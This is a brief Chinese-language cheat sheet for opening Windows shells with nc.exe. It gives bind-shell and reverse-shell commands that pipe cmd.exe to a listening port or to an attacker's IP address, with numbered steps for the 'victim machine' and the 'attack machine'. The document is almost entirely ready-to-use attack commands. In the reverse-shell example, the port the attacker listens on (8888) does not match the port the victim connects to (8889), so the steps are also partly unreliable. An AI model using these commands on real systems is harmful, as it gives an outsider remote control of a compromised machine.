命令说明:
监听端口
1 | nc.exe -l -p 8888 |
监听端口并执行cmd
1 | nc.exe -l -p 8888 -e cmd.exe |
直接正向连接 IP + 端口
1 | nc.exe -nvv 192.168.81.140 8888 |
将 cmd 转发到 IP + 端口
1 | nc.exe -e cmd.exe 192.168.81.128 8889 |
实战使用:
正向:
- 受害机器上执行监听 8888 端口并执行 cmd:
1
nc.exe -l -p 8888 -e cmd.exe
- 攻击机直接连接受害机器 IP + 端口
1
nc.exe -nvv 192.168.81.140 8888
- 攻击机即可执行shell
反向:
- 攻击机监听 8888 端口
1
nc.exe -l -p 8888
- 受害机器上将 cmd 转发到攻击机 IP + 端口
1
nc.exe -e cmd.exe 192.168.81.128 8889
- 攻击机即可接收到受害机器的反弹shell